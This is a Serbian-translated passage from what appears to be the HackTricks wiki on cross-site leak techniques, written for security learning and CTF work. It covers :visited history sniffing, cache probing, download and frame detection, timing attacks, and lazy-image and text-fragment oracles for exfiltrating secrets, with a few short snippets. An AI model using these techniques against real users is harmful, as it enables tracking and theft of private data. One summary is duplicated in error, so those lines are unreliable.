* **Sažetak:** Identifikujte varijacije u stilizovanju veb sajta koje se koreliraju sa korisnikovim stanjem ili statusom.
* **Primer koda**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)

Veb aplikacije mogu promeniti **stilizovanje veb sajta u zavisnosti od statusa korisnika**. CSS fajlovi sa različitih izvora mogu biti ugrađeni na stranici napadača pomoću **HTML link elementa**, i **pravila** će biti **primenjena** na stranicu napadača. Ako stranica dinamički menja ova pravila, napadač može **detektovati** ove **razlike** u zavisnosti od korisničkog stanja.\
Kao tehniku procure, napadač može koristiti metod `window.getComputedStyle` da **pročita CSS** svojstva određenog HTML elementa. Kao rezultat, napadač može pročitati proizvoljna CSS svojstva ako su poznati pogođeni element i naziv svojstva.

### CSS Istorija

* **Metode uključivanja**: HTML elementi
* **Detektoviva razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
* **Sažetak:** Detektujte da li je stil `:visited` primenjen na URL, što ukazuje da je već posećen
* **Primer koda**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)

{% hint style="info" %}
Prema [**ovome**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/), ovo ne funkcioniše u headless Chrome-u.
{% endhint %}

CSS `:visited` selektor se koristi za stilizovanje URL-ova na drugačiji način ako su ih korisnici prethodno posetili. Ranije je metoda `getComputedStyle()` mogla biti korišćena za identifikaciju ovih stilskih razlika. Međutim, moderni pregledači su implementirali sigurnosne mere kako bi sprečili da ova metoda otkrije stanje linka. Ove mere uključuju uvek vraćanje izračunatog stila kao da je link posećen i ograničavanje stilova koji se mogu primeniti sa selektorom `:visited`.

I pored ovih ograničenja, moguće je neizravno uočiti posećeno stanje linka. Jedna tehnika uključuje prevaru korisnika da interaguju sa područjem koje je pogođeno CSS-om, posebno korišćenjem svojstva `mix-blend-mode`. Ovo svojstvo omogućava mešanje elemenata sa njihovom pozadinom, potencijalno otkrivajući posećeno stanje na osnovu korisničke interakcije.

Osim toga, detekcija može biti postignuta bez interakcije korisnika iskorišćavanjem vremena renderovanja linkova. Pošto pregledači mogu renderovati posećene i neposećene linkove na različite načine, ovo može uvesti merljivu razliku u vremenu renderovanja. Dokaz koncepta (PoC) je pomenut u izveštaju o bagu u Chromium-u, demonstrirajući ovu tehniku korišćenjem više linkova da pojača razliku u vremenu, čime se čini da je posećeno stanje detektovano analizom vremena.

Za dodatne detalje o ovim svojstvima i metodama, posetite njihove stranice sa dokumentacijom:

* `:visited`: [MDN Dokumentacija](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
* `getComputedStyle()`: [MDN Dokumentacija](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
* `mix-blend-mode`: [MDN Dokumentacija](https://developer.mozilla.org/en-US/docs/Web/CSS/mix-blend-mode)
### ContentDocument X-Frame Leak

* **Metode uključivanja**: Okviri
* **Detektibilna razlika**: Zaglavlja
* **Više informacija**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
* **Sažetak:** U Google Chrome-u, posvećena greška se prikazuje kada je stranica blokirana za ugradnju na sajt preko različitog porekla zbog restrikcija X-Frame-Options.
* **Primer koda**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)

U Chrome-u, ako je stranica sa zaglavljem `X-Frame-Options` postavljena na "deny" ili "same-origin" ugrađena kao objekat, pojavljuje se stranica greške. Chrome jedinstveno vraća prazan dokument objekat (umesto `null`) za svojstvo `contentDocument` ovog objekta, za razliku od iframova ili drugih pregledača. Napadači bi mogli iskoristiti ovo otkrivanjem praznog dokumenta, potencijalno otkrivajući informacije o stanju korisnika, posebno ako programeri nekonzistentno postavljaju zaglavlje X-Frame-Options, često previdjevajući stranice greške. Svest i dosledna primena sigurnosnih zaglavlja su ključne za sprečavanje takvih curenja.

### Detekcija preuzimanja

* **Metode uključivanja**: Okviri, Iskačući prozori
* **Detektibilna razlika**: Zaglavlja
* **Više informacija**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
* **Sažetak:** Napadač može razlikovati preuzimanje datoteka iskorišćavanjem iframova; nastavljena dostupnost iframa implicira uspešno preuzimanje datoteke.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)

Zaglavlje `Content-Disposition`, posebno `Content-Disposition: attachment`, instruiše pregledač da preuzme sadržaj umesto prikazivanja u liniji. Ovo ponašanje može biti iskorišćeno za otkrivanje da li korisnik ima pristup stranici koja pokreće preuzimanje datoteke. U pregledačima zasnovanim na Chromium-u, postoje nekoliko tehnika za otkrivanje ovog ponašanja preuzimanja:

1. **Pratnja trake preuzimanja**:
* Kada se datoteka preuzme u pregledačima zasnovanim na Chromium-u, traka preuzimanja se pojavljuje na dnu prozora pregledača.
* Prateći promene u visini prozora, napadači mogu zaključiti pojavu trake preuzimanja, sugerišući da je preuzimanje pokrenuto.
2. **Navigacija preuzimanja sa iframovima**:
* Kada stranica pokrene preuzimanje datoteke koristeći zaglavlje `Content-Disposition: attachment`, to ne izaziva događaj navigacije.
* Učitavanjem sadržaja u iframu i praćenjem događaja navigacije, moguće je proveriti da li uzrok dispozicije sadržaja izaziva preuzimanje datoteke (bez navigacije) ili ne.
3. **Navigacija preuzimanja bez iframova**:
* Slično kao tehnika sa iframe-om, ovaj metod uključuje korišćenje `window.open` umesto iframa.
* Praćenjem događaja navigacije u novootvorenom prozoru može se otkriti da li je pokrenuto preuzimanje datoteke (bez navigacije) ili je sadržaj prikazan u liniji (nastupa navigacija).

U scenarijima gde samo prijavljeni korisnici mogu pokrenuti takva preuzimanja, ove tehnike se mogu koristiti za indirektno zaključivanje autentifikacionog stanja korisnika na osnovu odgovora pregledača na zahtev za preuzimanje.

### Bajpasiranje particionisanog HTTP keša <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>

* **Metode uključivanja**: Iskačući prozori
* **Detektibilna razlika**: Vreme
* **Više informacija**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
* **Sažetak:** Napadač može razlikovati preuzimanje datoteka iskorišćavanjem iframova; nastavljena dostupnost iframa implicira uspešno preuzimanje datoteke.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (sa [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))

{% hint style="warning" %}
Zato je ova tehnika interesantna: Chrome sada ima **particionisanje keša**, a ključ keša novootvorene stranice je: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx)`, ali ako otvorim ngrok stranicu i koristim fetch u njoj, ključ keša će biti: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`, **ključ keša je različit**, tako da keš ne može biti deljen. Više detalja možete pronaći ovde: [Poboljšanje sigurnosti i privatnosti particionisanjem keša](https://developer.chrome.com/blog/http-cache-partitioning/)\
(Komentar sa [**ovde**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
{% endhint %}

Ako sajt `primer.com` uključuje resurs sa `*.primer.com/resource` tada će taj resurs imati **isti ključ keša** kao da je resurs direktno **zahtevan kroz navigaciju na vrh nivoa**. To je zato što ključ keša čine _eTLD+1_ na vrhu i okvir _eTLD+1_.

Zbog toga što je pristup kešu brži od učitavanja resursa, moguće je pokušati promeniti lokaciju stranice i otkazati je 20ms (na primer) nakon toga. Ako je poreklo promenjeno nakon zaustavljanja, to znači da je resurs keširan.\
Ili jednostavno **poslati neki fetch ka potencijalno keširanoj stranici i meriti vreme koje je potrebno**.

### Ručno preusmeravanje <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>

* **Metode uključivanja**: Fetch API
* **Detektibilna razlika**: Preusmeravanja
* **Više informacija**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234)
* **Sažetak:** Moguće je saznati da li je odgovor na zahtev fetch preusmeren
* **Primer koda**:

![](<../.gitbook/assets/image (652).png>)

### Fetch sa AbortController-om <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>

* **Metode uključivanja**: Fetch API
* **Detektibilna razlika**: Vreme
* **Više informacija**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
* **Sažetak:** Moguće je pokušati učitati resurs i prekinuti učitavanje pre nego što se završi. Zavisno o tome da li je izazvana greška, resurs je ili nije keširan.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)

Koristite _**fetch**_ i _**setTimeout**_ sa **AbortController**-om kako biste detektovali da li je **resurs keširan** i kako biste uklonili određeni resurs iz keša pregledača. Osim toga, proces se odvija bez keširanja novog sadržaja.
### Skriptna zagađenost

* **Metode uključivanja**: HTML elementi (skripta)
* **Detektibilna razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
* **Sažetak:** Moguće je **prepisati ugrađene funkcije** i pročitati njihove argumente čak i iz **skripte sa različitog porekla** (koja se ne može direktno pročitati), što može **procuriti vredne informacije**.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)

### Servisni radnici <a href="#service-workers" id="service-workers"></a>

* **Metode uključivanja**: Iskačući prozori
* **Detektibilna razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers)
* **Sažetak:** Merenje vremena izvršavanja veba koristeći servisne radnike.
* **Primer koda**:

U datom scenariju, napadač preuzima inicijativu da registruje **servisnog radnika** unutar jednog od svojih domena, specifično "attacker.com". Zatim, napadač otvara novi prozor na ciljnom veb sajtu iz glavnog dokumenta i naređuje **servisnom radniku** da pokrene tajmer. Kako novi prozor počinje da se učitava, napadač navigira referencu dobijenu u prethodnom koraku ka stranici koju upravlja **servisni radnik**.

Po dolasku zahteva pokrenutog u prethodnom koraku, **servisni radnik** odgovara sa statusnim kodom **204 (Nema sadržaja)**, efikasno završavajući proces navigacije. U ovom trenutku, **servisni radnik** beleži merenje sa tajmera pokrenutog ranije u drugom koraku. Ovo merenje je uticano trajanjem JavaScript-a koji uzrokuje kašnjenja u procesu navigacije.

{% hint style="warning" %}
U merenju izvršavanja je moguće **eliminisati** **mrežne faktore** kako bi se dobile **preciznije merenja**. Na primer, učitavanjem resursa korišćenih od strane stranice pre njenog učitavanja.
{% endhint %}

### Vreme dohvata

* **Metode uključivanja**: Fetch API
* **Detektibilna razlika**: Vreme (uglavnom zbog Sadržaja stranice, Statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
* **Sažetak:** Koristite [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) da izmerite vreme potrebno za izvršavanje zahteva. Mogu se koristiti i drugi časovnici.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)

### Vreme preko prozora

* **Metode uključivanja**: Iskačući prozori
* **Detektibilna razlika**: Vreme (uglavnom zbog Sadržaja stranice, Statusnog koda)
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
* **Sažetak:** Koristite [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) da izmerite vreme potrebno za izvršavanje zahteva koristeći `window.open`. Mogu se koristiti i drugi časovnici.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice na svetu.\
Pristupite danas:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## Sa HTML-om ili Re Injekcijom

Ovde možete pronaći tehnike za eksfiltraciju informacija iz HTML-a sa različitog porekla **ubacivanjem HTML sadržaja**. Ove tehnike su interesantne u slučajevima kada iz bilo kog razloga možete **ubaciti HTML ali ne možete ubaciti JS kod**.

### Viseći Markup

{% content-ref url="dangling-markup-html-scriptless-injection/" %}
[dangling-markup-html-scriptless-injection](dangling-markup-html-scriptless-injection/)
{% endcontent-ref %}

### Učitavanje slika na zahtev

Ako trebate **eksfiltrirati sadržaj** i možete **dodati HTML pre tajnog sadržaja** trebali biste proveriti **uobičajene tehnike visećeg markupa**.\
Međutim, ako iz bilo kog razloga **MORATE** to uraditi **po karakter po karakter** (možda je komunikacija putem pogotka keša) možete koristiti ovu prevaru.

**Slike** u HTML-u imaju atribut "**loading**" čija vrednost može biti "**lenjo**". U tom slučaju, slika će se učitati kada bude prikazana, a ne dok se stranica učitava:
```html
<img src=/something loading=lazy >
```
Dakle, ono što možete uraditi jeste da **dodate puno beskorisnih znakova** (Na primer **hiljade "W" znakova**) da **popunite web stranicu pre tajnog sadržaja ili dodate nešto poput** `<br><canvas height="1850px"></canvas><br>.`\
Zatim, ako na primer naš **injekcija se pojavi pre zastave**, **slika** će biti **učitana**, ali ako se pojavi **nakon** **zastave**, zastava + beskorisni znakovi će **sprečiti učitavanje** (morate igrati se sa količinom beskorisnih znakova koje treba postaviti). To se desilo u [**ovom writeup-u**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/).

Druga opcija bila bi korišćenje **scroll-to-text-fragment** ako je dozvoljeno:

#### Scroll-to-text-fragment

Međutim, možete **omogućiti botu pristup stranici** sa nečim poput
```
#:~:text=SECR
```
Tako će web stranica izgledati nešto poput: **`https://victim.com/post.html#:~:text=SECR`**

Gde post.html sadrži napadačke znakove i slike koje se učitavaju lenjo, a zatim se dodaje tajna informacija o botu.

Ovaj tekst će naterati bota da pristupi bilo kom tekstu na stranici koji sadrži tekst `SECR`. Budući da je taj tekst tajna informacija i nalazi se **ispod slike**, slika će se **učitati samo ako je pretpostavljena tajna tačna**. Tako da imate svoj orakl za **eksfiltraciju tajne znak po znak**.

Neki primer koda za iskorišćavanje ovoga: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)

### Vreme lenjog učitavanja slike

Ako nije **moguće učitati spoljnu sliku** što bi moglo ukazati napadaču da je slika učitana, druga opcija bila bi **pokušati pogoditi znak nekoliko puta i meriti to**. Ako je slika učitana, svi zahtevi će trajati duže nego ako slika nije učitana. To je ono što je korišćeno u [**rešenju ovog teksta**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **sumirano ovde:**

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %}
[event-loop-blocking-+-lazy-images.md](xs-search/event-loop-blocking-+-lazy-images.md)
{% endcontent-ref %}

### ReDoS

{% content-ref url="regular-expression-denial-of-service-redos.md" %}
[regular-expression-denial-of-service-redos.md](regular-expression-denial-of-service-redos.md)
{% endcontent-ref %}

### CSS ReDoS

Ako se koristi `jQuery(location.hash)`, moguće je otkriti putem vremena da li **postoji određeni HTML sadržaj**, jer ako se selektor `main[id='site-main']` ne podudara, nije potrebno proveravati ostale **selektore**:
```javascript
$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")
```
### CSS Injection

{% content-ref url="xs-search/css-injection/" %}
[css-injection](xs-search/css-injection/)
{% endcontent-ref %}

## Odbrane

Preporučene su mere zaštite navedene u [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) takođe u svakom delu wiki [https://xsleaks.dev/](https://xsleaks.dev/). Pogledajte tamo više informacija o tome kako se zaštititi od ovih tehnika.

## Reference

* [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)
* [https://xsleaks.dev/](https://xsleaks.dev)
* [https://github.com/xsleaks/xsleaks](https://github.com/xsleaks/xsleaks)
* [https://xsinator.com/](https://xsinator.com/)
* [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice na svetu.\
Pristupite danas:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}